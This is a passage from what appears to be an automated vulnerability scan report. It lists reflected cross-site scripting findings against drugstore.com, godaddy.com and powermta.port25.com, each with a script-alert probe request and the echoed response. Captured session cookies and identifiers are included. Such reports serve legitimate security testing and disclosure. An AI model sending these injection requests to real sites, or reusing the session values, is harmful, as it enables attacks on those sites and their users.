GET /pharmacy/drugindex/rxsearch.asp?search=ess&96e13"><script>alert(1)</script>b95a630ec78 =1 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7:7B1B08A6C5BF4A968C79C9BFB007FDD0:ssmstg55acliez55gebilj55; ASP.NET_SessionId=tujq4xeiqb4bta55tp0jzqna; drugstore%2Efish=UserID=57ABB42C1945443F8A38894F54FEB227; ABTests=07082011_tns_abtest=abtest_not_qualified@&20051228_entrypages=1@09/16/2011 9:30:24 AM&091211_GWP_YTC=1@09/16/2011 9:30:24 AM&040610_bizrate_beauty=1@09/16/2011 9:30:24 AM&030411_click2chat_dscm=1@09/16/2011 9:30:24 AM&110210_bizrate_VD=abtest_not_qualified@&20090319_ForeSee_Vision=abtest_not_qualified@&pdetails_ver2=1@09/16/2011 9:30:24 AM&20060410_bizrate=0@09/16/2011 9:30:24 AM&20070530_GoogleCheckout=1@09/16/2011 9:30:24 AM&aggregate_knowledge=1@09/16/2011 9:30:24 AM&ship_interrupt=2@09/16/2011 9:30:24 AM&05262011_ivd_ciba_25percent_off=abtest_not_qualified@; BIGipServerdscm_farm=2316609728.0.0000; s_sess=%20s_cc%3Dtrue%3B%20abtest%3DABTEST_20060410_bizrate%257C0%3B%20s_sq%3Ddrugstorecomglobalprod%253D%252526pid%25253Dotc%2525253Ahomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_search.gif%252526ot%25253DIMAGE%3B; s_vi=[CS]v1|2739BCD58514B3D4-4000018C2004D12D[CE]; _br_uid_1=uid%3D5299788113416%3A; __cmbDomTm=0; __cmbU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; __cmbTpvTm=1058
Response
HTTP/1.1 200 OK:7B1B08A6C5BF4A968C79C9BFB007FDD0:kfehu3bw4kj4ruzyogwsyfjo; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:32:31 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... /drugindex/rxsearch.asp?search=ess&96e13"><script>alert(1)</script>b95a630ec78 =1" />...[SNIP]...
2.43. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx [callback parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/Domains/Controls/JsonContent/DotTypePricing.aspx
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 48043<script>alert(1)</script>b3ce9c0321b was submitted in the callback parameter. This input was echoed unmodified in the application's response.
Request
GET /Domains/Controls/JsonContent/DotTypePricing.aspx?tab=general&callback=tabFill48043<script>alert(1)</script>b3ce9c0321b &targetDivId=tab2&tabFill=jsonp1316214560432&_=1316214560519 HTTP/1.1/domains/search.aspx;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; currency1=potableSourceStr=USD; adc1=US; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1
Response
HTTP/1.1 200 OK48043<script>alert(1)</script>b3ce9c0321b ({"Error":"Error"})
2.44. http://www.godaddy.com/external/json/PcSetData.aspx [callback parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/external/json/PcSetData.aspx
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 82ce3<script>alert(1)</script>e52d6463d1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
Request
GET /external/json/PcSetData.aspx?ci=17368&callback=pcj_setdata82ce3<script>alert(1)</script>e52d6463d1 &pcj_setdata=jQuery151042539176414720714_1316214385506&_=1316214385976 HTTP/1.1;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; currency1=potableSourceStr=USD; adc1=US; SplitValue1=95; HPBackground=DanicaImageOne; traffic=cookies=1&referrer=http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1
Response
HTTP/1.1 200 OK82ce3<script>alert(1)</script>e52d6463d1 ({"Error":"Error"})
2.45. http://www.godaddy.com/offers/jsoncontent/recommendedoffers.aspx [callback parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/offers/jsoncontent/recommendedoffers.aspx
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 70544<script>alert(1)</script>9c6b6072b91 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
Request
GET /offers/jsoncontent/recommendedoffers.aspx?ci=51455%2c50960&callback=jsonContent._fill70544<script>alert(1)</script>9c6b6072b91 &targetDivId=tab1&jsonContent._fill=jQuery15108357319077476859_1316214566272&_=1316214567345 HTTP/1.1/offers/hot-deals2.aspx?ci=51455;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; currency1=potableSourceStr=USD; adc1=US; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=
Response
HTTP/1.1 200 OK70544<script>alert(1)</script>9c6b6072b91 ({"Error":"Error"})
2.46. http://www.powermta.port25.com/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f34"><script>alert(1)</script>6062cb3b219 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64f34\"><script>alert(1)</script>6062cb3b219 in the application's response.
Request
GET /?64f34"><script>alert(1)</script>6062cb3b219 =1 HTTP/1.1.port25.com/download-a-white-paper//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.38440b2cc83a3d5c03dcf8c; __ar_v4=%7C4LZ2WHLFKZGJBDJQYVBYXX%3A20110916%3A1%7CUSFQSVPCUNEC3MWWKVX6RH%3A20110916%3A1%7CNQ5TTRI2MVGQHFZLQL6SMW%3A20110916%3A1; __utma=1.5711670.1316204852.1316204852.1316204852.1; __utmb=1.2.10.1316204852; __utmc=1; __utmz=1.1316204852.1.1.utmgclid=CL3QyvqJoqsCFSOAgwodRgln2A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 403 Forbidden.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/?64f34\"><script>alert(1)</script>6062cb3b219 =1" />...[SNIP]...
2.47. http://www.powermta.port25.com/download-a-white-paper/ [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/download-a-white-paper/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f0d"><script>alert(1)</script>51bb29a8f27 was submitted in the REST URL parameter 1. This input was echoed as c9f0d\"><script>alert(1)</script>51bb29a8f27 in the application's response.
Request
GET /download-a-white-paperc9f0d"><script>alert(1)</script>51bb29a8f27 / HTTP/1.1.port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.38440b2cc83a3d5c03dcf8c; __utma=1.5711670.1316204852.1316204852.1316204852.1; __utmb=1.1.10.1316204852; __utmc=1; __utmz=1.1316204852.1.1.utmgclid=CL3QyvqJoqsCFSOAgwodRgln2A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; __ar_v4=%7C4LZ2WHLFKZGJBDJQYVBYXX%3A20110916%3A1%7CUSFQSVPCUNEC3MWWKVX6RH%3A20110916%3A1%7CNQ5TTRI2MVGQHFZLQL6SMW%3A20110916%3A1
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/download-a-white-paperc9f0d\"><script>alert(1)</script>51bb29a8f27 /" />...[SNIP]...
2.48. http://www.powermta.port25.com/download-a-white-paper/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/download-a-white-paper/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72458"><script>alert(1)</script>6a2bba94794 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72458\"><script>alert(1)</script>6a2bba94794 in the application's response.
Request
GET /download-a-white-paper/?72458"><script>alert(1)</script>6a2bba94794 =1 HTTP/1.1.port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.38440b2cc83a3d5c03dcf8c; __utma=1.5711670.1316204852.1316204852.1316204852.1; __utmb=1.1.10.1316204852; __utmc=1; __utmz=1.1316204852.1.1.utmgclid=CL3QyvqJoqsCFSOAgwodRgln2A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; __ar_v4=%7C4LZ2WHLFKZGJBDJQYVBYXX%3A20110916%3A1%7CUSFQSVPCUNEC3MWWKVX6RH%3A20110916%3A1%7CNQ5TTRI2MVGQHFZLQL6SMW%3A20110916%3A1
Response
HTTP/1.1 403 Forbidden.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/x...[SNIP]... .port25.com/download-a-white-paper/?72458\"><script>alert(1)</script>6a2bba94794 =1" />...[SNIP]...
2.49. http://www.powermta.port25.com/smtp-server-software-2/ [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/smtp-server-software-2/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b40b"><script>alert(1)</script>cb227f93e82 was submitted in the REST URL parameter 1. This input was echoed as 3b40b\"><script>alert(1)</script>cb227f93e82 in the application's response.
Request
GET /smtp-server-software-23b40b"><script>alert(1)</script>cb227f93e82 /?gclid=CL3QyvqJoqsCFSOAgwodRgln2A HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/smtp-server-software-23b40b\"><script>alert(1)</script>cb227f93e82 /?gclid=CL3QyvqJoqsCFSOAgwodRgln2A" />...[SNIP]...
2.50. http://www.powermta.port25.com/smtp-server-software-2/ [gclid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/smtp-server-software-2/
Issue detail
The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 118ce"><script>alert(1)</script>2713615afd7 was submitted in the gclid parameter. This input was echoed as 118ce\"><script>alert(1)</script>2713615afd7 in the application's response.
Request
GET /smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A118ce"><script>alert(1)</script>2713615afd7 HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 403 Forbidden.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A118ce\"><script>alert(1)</script>2713615afd7 " />...[SNIP]...
2.51. http://www.powermta.port25.com/smtp-server-software-2/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/smtp-server-software-2/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cb9"><script>alert(1)</script>b1ff255d5a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26cb9\"><script>alert(1)</script>b1ff255d5a7 in the application's response.
Request
GET /smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A&26cb9"><script>alert(1)</script>b1ff255d5a7 =1 HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 403 Forbidden.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A&26cb9\"><script>alert(1)</script>b1ff255d5a7 =1" />...[SNIP]...
2.52. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/about-logo.gif
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 724b4"><script>alert(1)</script>3f8b1f1a8b2 was submitted in the REST URL parameter 1. This input was echoed as 724b4\"><script>alert(1)</script>3f8b1f1a8b2 in the application's response.
Request
GET /wp-content724b4"><script>alert(1)</script>3f8b1f1a8b2 /themes/powermta1/images/about-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content724b4\"><script>alert(1)</script>3f8b1f1a8b2 /themes/powermta1/images/about-logo.gif" />...[SNIP]...
2.53. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/about-logo.gif
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfbc2"><script>alert(1)</script>cd7034d9c1 was submitted in the REST URL parameter 2. This input was echoed as bfbc2\"><script>alert(1)</script>cd7034d9c1 in the application's response.
Request
GET /wp-content/themesbfbc2"><script>alert(1)</script>cd7034d9c1 /powermta1/images/about-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themesbfbc2\"><script>alert(1)</script>cd7034d9c1 /powermta1/images/about-logo.gif" />...[SNIP]...
2.54. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/about-logo.gif
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56ed8"><script>alert(1)</script>f042c7c93c1 was submitted in the REST URL parameter 3. This input was echoed as 56ed8\"><script>alert(1)</script>f042c7c93c1 in the application's response.
Request
GET /wp-content/themes/powermta156ed8"><script>alert(1)</script>f042c7c93c1 /images/about-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta156ed8\"><script>alert(1)</script>f042c7c93c1 /images/about-logo.gif" />...[SNIP]...
2.55. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/about-logo.gif
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18d2c"><script>alert(1)</script>18b37ffd2 was submitted in the REST URL parameter 4. This input was echoed as 18d2c\"><script>alert(1)</script>18b37ffd2 in the application's response.
Request
GET /wp-content/themes/powermta1/images18d2c"><script>alert(1)</script>18b37ffd2 /about-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images18d2c\"><script>alert(1)</script>18b37ffd2 /about-logo.gif" />...[SNIP]...
2.56. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/about-logo.gif
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efd2c"><script>alert(1)</script>6f37b1a5ba8 was submitted in the REST URL parameter 5. This input was echoed as efd2c\"><script>alert(1)</script>6f37b1a5ba8 in the application's response.
Request
GET /wp-content/themes/powermta1/images/about-logo.gifefd2c"><script>alert(1)</script>6f37b1a5ba8 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/about-logo.gifefd2c\"><script>alert(1)</script>6f37b1a5ba8 " />...[SNIP]...
2.57. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/about-logo.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95e09"><script>alert(1)</script>3618a2f10ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95e09\"><script>alert(1)</script>3618a2f10ed in the application's response.
Request
GET /wp-content/themes/powermta1/images/about-logo.gif?95e09"><script>alert(1)</script>3618a2f10ed =1 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69f53addddc0fabf237f0c8a
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/about-logo.gif?95e09\"><script>alert(1)</script>3618a2f10ed =1" />...[SNIP]...
2.58. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/face-logo.gif
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb569"><script>alert(1)</script>1a1bfa8a934 was submitted in the REST URL parameter 1. This input was echoed as eb569\"><script>alert(1)</script>1a1bfa8a934 in the application's response.
Request
GET /wp-contenteb569"><script>alert(1)</script>1a1bfa8a934 /themes/powermta1/images/face-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-contenteb569\"><script>alert(1)</script>1a1bfa8a934 /themes/powermta1/images/face-logo.gif" />...[SNIP]...
2.59. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/face-logo.gif
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e226f"><script>alert(1)</script>f7e10f62fb3 was submitted in the REST URL parameter 2. This input was echoed as e226f\"><script>alert(1)</script>f7e10f62fb3 in the application's response.
Request
GET /wp-content/themese226f"><script>alert(1)</script>f7e10f62fb3 /powermta1/images/face-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themese226f\"><script>alert(1)</script>f7e10f62fb3 /powermta1/images/face-logo.gif" />...[SNIP]...
2.60. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/face-logo.gif
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec337"><script>alert(1)</script>35c6e68ecc3 was submitted in the REST URL parameter 3. This input was echoed as ec337\"><script>alert(1)</script>35c6e68ecc3 in the application's response.
Request
GET /wp-content/themes/powermta1ec337"><script>alert(1)</script>35c6e68ecc3 /images/face-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1ec337\"><script>alert(1)</script>35c6e68ecc3 /images/face-logo.gif" />...[SNIP]...
2.61. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/face-logo.gif
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cca4"><script>alert(1)</script>76069474406 was submitted in the REST URL parameter 4. This input was echoed as 3cca4\"><script>alert(1)</script>76069474406 in the application's response.
Request
GET /wp-content/themes/powermta1/images3cca4"><script>alert(1)</script>76069474406 /face-logo.gif HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images3cca4\"><script>alert(1)</script>76069474406 /face-logo.gif" />...[SNIP]...
2.62. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/face-logo.gif
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efd7d"><script>alert(1)</script>b2723960a17 was submitted in the REST URL parameter 5. This input was echoed as efd7d\"><script>alert(1)</script>b2723960a17 in the application's response.
Request
GET /wp-content/themes/powermta1/images/face-logo.gifefd7d"><script>alert(1)</script>b2723960a17 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/face-logo.gifefd7d\"><script>alert(1)</script>b2723960a17 " />...[SNIP]...
2.63. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/face-logo.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfa4"><script>alert(1)</script>70fd71ce6fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1dfa4\"><script>alert(1)</script>70fd71ce6fe in the application's response.
Request
GET /wp-content/themes/powermta1/images/face-logo.gif?1dfa4"><script>alert(1)</script>70fd71ce6fe =1 HTTP/1.1/*;q=0.5;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/face-logo.gif?1dfa4\"><script>alert(1)</script>70fd71ce6fe =1" />...[SNIP]...
2.64. http://www.powermta.port25.com/wp-content/themes/powermta1/images/favicon.ico [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/favicon.ico
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2d81"><script>alert(1)</script>9be443f7c69 was submitted in the REST URL parameter 5. This input was echoed as f2d81\"><script>alert(1)</script>9be443f7c69 in the application's response.
Request
GET /wp-content/themes/powermta1/images/favicon.icof2d81"><script>alert(1)</script>9be443f7c69 HTTP/1.1;q=0.38440b2cc83a3d5c03dcf8c; __utma=1.5711670.1316204852.1316204852.1316204852.1; __utmb=1.1.10.1316204852; __utmc=1; __utmz=1.1316204852.1.1.utmgclid=CL3QyvqJoqsCFSOAgwodRgln2A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; __ar_v4=
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/images/favicon.icof2d81\"><script>alert(1)</script>9be443f7c69 " />...[SNIP]...
2.65. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/images/headerimg.jpg
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba96c"><script>alert(1)</script>dd2e31bf684 was submitted in the REST URL parameter 1. This input was echoed as ba96c\"><script>alert(1)</script>dd2e31bf684 in the application's response.
